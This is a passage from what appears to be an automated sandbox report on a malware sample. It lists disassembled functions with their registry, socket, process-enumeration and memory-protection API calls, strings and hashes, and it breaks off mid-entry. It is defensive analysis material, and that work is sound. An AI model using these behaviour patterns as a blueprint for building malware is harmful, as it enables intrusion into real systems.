                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: Resource$File$??2@??3@CloseCreateDirectoryFindHandleLoadLockSystemWritewsprintf
                        • String ID: GGGGGG$XXXXXX
                        • API String ID: 3303837233-960986945
                        • Opcode ID: 62d36b4c3a9717adabf70673e7b9da5624529c8d21c7069b05e041ff93643327
                        • Instruction ID: 04aaa10fcd26f9137dd4082bdad661446cf6c3c5eea2093c6f49501549e79182
                        • Opcode Fuzzy Hash: 62d36b4c3a9717adabf70673e7b9da5624529c8d21c7069b05e041ff93643327
                        • Instruction Fuzzy Hash: 4431E4726002046BE318CAB4CC56BEB369AEBC9360F144B2DF667972C0DEA49D088291
                        Function 1000DF30 Relevance: 12.1, APIs: 8, Instructions: 133registryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 271 1000df30-1000df61 272 1000df67 271->272 273 1000e07b-1000e082 call 1000e09b 271->273 274 1000df95-1000dfaf RegOpenKeyExA 272->274 275 1000e016-1000e030 RegOpenKeyExA 272->275 276 1000e046-1000e060 RegOpenKeyExA 272->276 277 1000df6e-1000df8f RegCreateKeyExA 272->277 279 1000e087-1000e09a 273->279 274->273 280 1000dfb5-1000dfba 274->280 275->273 281 1000e032-1000e042 RegDeleteKeyA 275->281 276->273 282 1000e062-1000e072 RegDeleteValueA 276->282 277->273 277->274 280->273 283 1000dfc0-1000dfc3 280->283 281->273 284 1000e044 281->284 282->273 285 1000e074 282->285 286 1000dff0-1000e012 RegSetValueExA 283->286 287 1000dfc5-1000dfc8 283->287 284->285 285->273 286->273 289 1000e014 286->289 287->273 288 1000dfce-1000dfe5 RegSetValueExA 287->288 288->273 290 1000dfeb 288->290 289->285 290->285
                        APIs
                        • RegCreateKeyExA.KERNEL32(?,00000001,00000000,00000000,00000000,000F003F,00000000,75BF8400,75BF8400,75BF8400,74DE8A60,00000000,?,00000000,00000001,?), ref: 1000DF87
                        • RegOpenKeyExA.KERNEL32(0002001F,00000000,00000000,0002001F,?), ref: 1000DFA7
                        • RegSetValueExA.ADVAPI32(?,00000000,00000000,?,?,?), ref: 1000DFDD
                        • RegSetValueExA.KERNEL32(?,00000000,00000000,?,?), ref: 1000E00A
                        • RegOpenKeyExA.ADVAPI32(?,?,00000000,0002001F,?), ref: 1000E028
                        • RegDeleteKeyA.ADVAPI32(?,?), ref: 1000E03A
                        • RegOpenKeyExA.ADVAPI32(?,?,00000000,0002001F,?), ref: 1000E058
                        • RegDeleteValueA.ADVAPI32(?,?), ref: 1000E06A
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: OpenValue$Delete$Create
                        • String ID:
                        • API String ID: 2295199933-0
                        • Opcode ID: db3b2b67166d1bb11bde5bceef6296bb7a822e4b3c236aec2521ab1580a2075a
                        • Instruction ID: 1b9f00cf2018ec585052cc404c00dab844629f3f5ae0e70b8896e327a927e23a
                        • Opcode Fuzzy Hash: db3b2b67166d1bb11bde5bceef6296bb7a822e4b3c236aec2521ab1580a2075a
                        • Instruction Fuzzy Hash: D6411DB1A04289EBEB10CF95CD84EAF77BDFB48790B108618FA15E3144D7B5ED418B61
                        Function 10003B50 Relevance: 10.6, APIs: 7, Instructions: 97networkCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                          • Part of subcall function 10003FC0: setsockopt.WS2_32(?,0000FFFF,00000080,00000000), ref: 10003FEA
                          • Part of subcall function 10003FC0: CancelIo.KERNEL32(?), ref: 10003FF7
                          • Part of subcall function 10003FC0: InterlockedExchange.KERNEL32(?,00000000), ref: 10004006
                          • Part of subcall function 10003FC0: closesocket.WS2_32(?), ref: 10004013
                          • Part of subcall function 10003FC0: SetEvent.KERNEL32(?), ref: 10004020
                        • ResetEvent.KERNEL32(?,74DF23A0,00000000,?,?,?,?,?,10002764,?,?), ref: 10003B63
                        • socket.WS2_32 ref: 10003B76
                        • gethostbyname.WS2_32(?), ref: 10003B96
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: Event$CancelExchangeInterlockedResetclosesocketgethostbynamesetsockoptsocket
                        • String ID:
                        • API String ID: 513860241-0
                        • Opcode ID: 4d899b3987969ecd4fd1a86c1a1ea7a7306cfc35f12dbd9e192bfe98e165e6e5
                        • Instruction ID: 1df40d65a7e954c865ba851cc9ca147fa345c901a36a43ec443bb06f7c0b526b
                        • Opcode Fuzzy Hash: 4d899b3987969ecd4fd1a86c1a1ea7a7306cfc35f12dbd9e192bfe98e165e6e5
                        • Instruction Fuzzy Hash: 3B31C171200351BFE320DF68CC85F9BBBE9BF85754F00891DF2999A280DBB1A4488762
                        Function 100127B0 Relevance: 10.6, APIs: 7, Instructions: 53processstringCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,74DF0F10,74DF0F00,74DF2EE0,10002D11,Rstray.exe), ref: 100127B8
                        • ??2@YAPAXI@Z.MSVCRT(00000128,00000002,00000000,?,74DF0F10,74DF0F00,74DF2EE0,10002D11,Rstray.exe), ref: 100127C4
                        • Process32First.KERNEL32(00000000,00000000), ref: 100127D6
                        • _strcmpi.MSVCRT ref: 100127E8
                        • Process32Next.KERNEL32(00000000,00000000), ref: 100127FF
                        • lstrcmpiA.KERNEL32(00000024,?), ref: 1001280A
                        • Process32Next.KERNEL32(00000000,00000000), ref: 10012816
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process32$Next$??2@CreateFirstSnapshotToolhelp32_strcmpilstrcmpi
                        • String ID:
                        • API String ID: 3655294272-0
                        • Opcode ID: 3acb92f7a082f0560a38fcce033ec22d4c764fcd9f584452c6633fb095ea1df2
                        • Instruction ID: f554131ab95697ded66182dc9c6194b9f7e78a4009f5edafd1c660a05443097e
                        • Opcode Fuzzy Hash: 3acb92f7a082f0560a38fcce033ec22d4c764fcd9f584452c6633fb095ea1df2
                        • Instruction Fuzzy Hash: 10F0F4B13013122BE710967AAD49AA77BCDCF82BE6F014434FA04CE082FA31F8608271
                        Function 100012E0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 51stringnetworkCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 311 100012e0-1000135a wsprintfA call 1000da90 lstrlen 314 10001364-10001370 lstrlen 311->314 315 1000135c-1000135e gethostname 311->315 315->314
                        APIs
                        • wsprintfA.USER32 ref: 1000132A
                          • Part of subcall function 1000DA90: RegOpenKeyExA.KERNEL32(?,00000000,00000000,00020019,?,74DF23A0,?,?), ref: 1000DAFC
                        • lstrlen.KERNEL32(?), ref: 10001356
                        • gethostname.WS2_32(?,?), ref: 1000135E
                        • lstrlen.KERNEL32(?), ref: 10001365
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrlen$Opengethostnamewsprintf
                        • String ID: Host$SYSTEM\CurrentControlSet\Services\%s
                        • API String ID: 2381335061-3973614608
                        • Opcode ID: aa4ad73e3e86f048d8088258d518df793537927515d1099ef6d77d1d5a92305d
                        • Instruction ID: 36a66368fb66d0f392133d3de8f6d52269f6d0892d670254c430f542133935b3
                        • Opcode Fuzzy Hash: aa4ad73e3e86f048d8088258d518df793537927515d1099ef6d77d1d5a92305d
                        • Instruction Fuzzy Hash: E401A7712003547FF7249624CC55FEB739EEFC8754F408829F74593240D6B56D4586A6
                        Function 10003990 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 48networkCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 316 10003990-10003a64 call 100035e0 * 4 WSAStartup CreateEventA
                        APIs
                          • Part of subcall function 100035E0: RtlInitializeCriticalSection.NTDLL(?), ref: 100035F8
                        • WSAStartup.WS2_32(00000202,?), ref: 100039FD
                        • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 10003A0B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateCriticalEventInitializeSectionStartup
                        • String ID: 0$G$h$s
                        • API String ID: 1327880603-311548548
                        • Opcode ID: 14440d884872b4a7e93842e89cfad952c210232e49c4a394018a1025bab9c086
                        • Instruction ID: 34ec8cc1a49c1281e17a861c633ccf758028df7d95d732c7f969fdaadcc4b56f
                        • Opcode Fuzzy Hash: 14440d884872b4a7e93842e89cfad952c210232e49c4a394018a1025bab9c086
                        • Instruction Fuzzy Hash: 6021AF34108BC0DEE325CB28C905B87BBD8AF96704F04891DE4EE476D1D7B9A509CB63
                        Function 10001240 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26registryCOMMON
                        Download Yara Rule
                        APIs
                        • RegOpenKeyA.ADVAPI32(80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,00000004), ref: 1000125F
                        • RegQueryValueExA.KERNEL32(?,~MHz,00000000,?,?,?,?,?,?,?,00000000,74DF0F00,00000000), ref: 10001280
                        • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,74DF0F00,00000000), ref: 1000128B
                        Strings
                        • HARDWARE\DESCRIPTION\System\CentralProcessor\0, xrefs: 10001255
                        • ~MHz, xrefs: 1000127A
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseOpenQueryValue
                        • String ID: HARDWARE\DESCRIPTION\System\CentralProcessor\0$~MHz
                        • API String ID: 3677997916-2226868861
                        • Opcode ID: 38e8219e42e4db55c2fa6dfb5570c5b58118580aa776850d210d057bb2b41c5a
                        • Instruction ID: 35c208d4d3540590a10e284a9e24e56e80ebe8266937a50f360b862ca68792b9
                        • Opcode Fuzzy Hash: 38e8219e42e4db55c2fa6dfb5570c5b58118580aa776850d210d057bb2b41c5a
                        • Instruction Fuzzy Hash: 10F0F2B8508345BFE300DB64CD88E6BB7E9EBC8708F00CD0CF68982210E674E958CB56
                        Function 10003FC0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                        Download Yara Rule
                        APIs
                        • setsockopt.WS2_32(?,0000FFFF,00000080,00000000), ref: 10003FEA
                        • CancelIo.KERNEL32(?), ref: 10003FF7
                        • InterlockedExchange.KERNEL32(?,00000000), ref: 10004006
                        • closesocket.WS2_32(?), ref: 10004013
                        • SetEvent.KERNEL32(?), ref: 10004020
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: CancelEventExchangeInterlockedclosesocketsetsockopt
                        • String ID:
                        • API String ID: 1486965892-0
                        • Opcode ID: dd51bebf1240dcd95c78d2e4838092bba280de6a908707723a9b60bc76aba793
                        • Instruction ID: 5bdee382e423177a237ef2210d66a0bf4d0f96213256af2b3b43e88352a19dbf
                        • Opcode Fuzzy Hash: dd51bebf1240dcd95c78d2e4838092bba280de6a908707723a9b60bc76aba793
                        • Instruction Fuzzy Hash: 86F01275204751BFE7248B70CC88F9777A9AF49711F104A1DF69A462D0CFB0A8489756
                        Function 10003880 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: _ftolceil
                        • String ID:
                        • API String ID: 2006273141-0
                        • Opcode ID: 3d3adb59ccc62f60d4d94528d804ed6fd8ff66ace16d20562a200f969fee932f
                        • Instruction ID: 47ab152bc7bfee5a55097c9dda87f6add495a8b75b63f7b559e51acf30939cb7
                        • Opcode Fuzzy Hash: 3d3adb59ccc62f60d4d94528d804ed6fd8ff66ace16d20562a200f969fee932f
                        • Instruction Fuzzy Hash: 2C11B1B56083048BE710EF24EC8562BBBE5EBC4751F40C83EFD498B345EA759818CB62
                        Function 10012830 Relevance: 6.0, APIs: 4, Instructions: 39synchronizationCOMMON
                        Download Yara Rule
                        APIs
                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000002,00000001,00000006,?,?,?,?,?,10002764,?), ref: 10012854
                        • _beginthreadex.MSVCRT ref: 1001287C
                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1001288E
                        • CloseHandle.KERNEL32(?), ref: 10012899
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseCreateEventHandleObjectSingleWait_beginthreadex
                        • String ID:
                        • API String ID: 92035984-0
                        • Opcode ID: c64535b1f06177816f0bf6abf84d06a50c7e4e72da2e67fa653ce67b454c61e2
                        • Instruction ID: 798e2ea749e9a414042cceaf2cb57c9129b420e41b6d93a4f00483e46cf21c6a
                        • Opcode Fuzzy Hash: c64535b1f06177816f0bf6abf84d06a50c7e4e72da2e67fa653ce67b454c61e2
                        • Instruction Fuzzy Hash: EC01DA74608351AFD300DF58CC94F2BBBE5BB88714F144A0CF598A7390D674D9048B92
                        Function 100028E0 Relevance: 6.0, APIs: 4, Instructions: 17threadwindowCOMMON
                        Download Yara Rule
                        APIs
                        • GetInputState.USER32 ref: 100028E3
                        • GetCurrentThreadId.KERNEL32 ref: 100028EF
                        • PostThreadMessageA.USER32(00000000), ref: 100028F6
                        • GetMessageA.USER32(00000000,00000000,00000000,00000000), ref: 10002907
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: MessageThread$CurrentInputPostState
                        • String ID:
                        • API String ID: 2517755969-0
                        • Opcode ID: 467fd943cdf485c2228c8ab07c2f3d1e6c889fb3db9b5598c51c2eda3ead2745
                        • Instruction ID: ec20eca8a2726810b7ac3bdd9eb78ebb057f1ba0a7407110d6dd7586cdd0874f
                        • Opcode Fuzzy Hash: 467fd943cdf485c2228c8ab07c2f3d1e6c889fb3db9b5598c51c2eda3ead2745
                        • Instruction Fuzzy Hash: 47D09E76680360B7F7106BA48C4EF4A3A29AB14B02F904414F705DA2E1E6F456548B66
                        Function 100FA599 Relevance: 4.7, APIs: 3, Instructions: 206memoryCOMMON
                        Download Yara Rule
                        APIs
                        • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 100FA617
                        • VirtualProtect.KERNEL32(?,?,-0000002C,-00000524,?,-0000002C,00000000,-00000524), ref: 100FA786
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: Virtual$FreeProtect
                        • String ID:
                        • API String ID: 2581862158-0
                        • Opcode ID: 0d4901908797a334fb655ef77a27580c9664ec9e80afb356d6c38425ab25cfc6
                        • Instruction ID: 6f2f89bf7d1db90bc62700e0d4ef9e05fe8b12a546338cedc59c46f9f7a7bead
                        • Opcode Fuzzy Hash: 0d4901908797a334fb655ef77a27580c9664ec9e80afb356d6c38425ab25cfc6
                        • Instruction Fuzzy Hash: 356108B6A042199FDB21CA14CC80BA9B7F1EF86350F2944A8D585DB380D771ACC2EB50
                        Function 100041C0 Relevance: 4.6, APIs: 3, Instructions: 63networksleepCOMMON
                        Download Yara Rule
                        APIs
                        • send.WS2_32(?,00000005,?,00000000), ref: 100041F1
                        • Sleep.KERNEL32(0000000A), ref: 1000421E
                        • send.WS2_32(?,00000005,00000000,00000000), ref: 1000423B
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: send$Sleep
                        • String ID:
                        • API String ID: 3329562092-0
                        • Opcode ID: 96077dc66876e708ef1fcc9b6368c56c91208f17216d08347fa5526f0ee46f43
                        • Instruction ID: ecf95f45f29a536596c04502cf745caab706e2da7be84373f8426b650e5608f3
                        • Opcode Fuzzy Hash: 96077dc66876e708ef1fcc9b6368c56c91208f17216d08347fa5526f0ee46f43
                        • Instruction Fuzzy Hash: 5911E2B27093129BE314CF55DC84B4BB7E9EBC5B91F12041DF44987281DAB0DC89CB92
                        Function 004011CA Relevance: 3.1, APIs: 2, Instructions: 68memoryCOMMON
                        Download Yara Rule
                        APIs
                        • VirtualFree.KERNEL32(?,?,00004000,00000000,E9C11475,?,00000000,00000000,?,004010EB), ref: 00401217
                        • VirtualProtect.KERNEL32(?,?,00000000,004010EB,00000000,E9C11475,?,00000000,00000000,?,004010EB), ref: 00401264
                        Memory Dump Source
                        • Source File: 00000000.00000002.4082612578.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.4082597077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082631431.0000000000406000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082647752.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082671358.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082688873.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082705565.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_ILQ18dgzMU.jbxd
                        Similarity
                        • API ID: Virtual$FreeProtect
                        • String ID:
                        • API String ID: 2581862158-0
                        • Opcode ID: 1da9798cf1ab2a0cbd218d6a4efc8fbb9b69a997ebb0dc4acef0dbbb924efbe0
                        • Instruction ID: 7fa2e98a2861ea618fd0cbdcf95870bab1041a81b87b6b54e370ad3389b5c62d
                        • Opcode Fuzzy Hash: 1da9798cf1ab2a0cbd218d6a4efc8fbb9b69a997ebb0dc4acef0dbbb924efbe0
                        • Instruction Fuzzy Hash: 0B21A931A00210EFDB08CB44D998BBA7BA6EB84345F0141EDE906BB2E5C734AD11DBA5
                        Function 10003C80 Relevance: 3.1, APIs: 2, Instructions: 68networkCOMMON
                        Download Yara Rule
                        APIs
                        • select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 10003CDE
                        • recv.WS2_32(?,?,00002000,00000000), ref: 10003D12
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: recvselect
                        • String ID:
                        • API String ID: 741273618-0
                        • Opcode ID: f3ea7c8cad08968c178794aac95c1238a31c3cf0671c12b7416fdc071fe8bd09
                        • Instruction ID: 3002836707706edc6e7c57d2e35336c74cd7d28b3c0800afafed42bc305aadaa
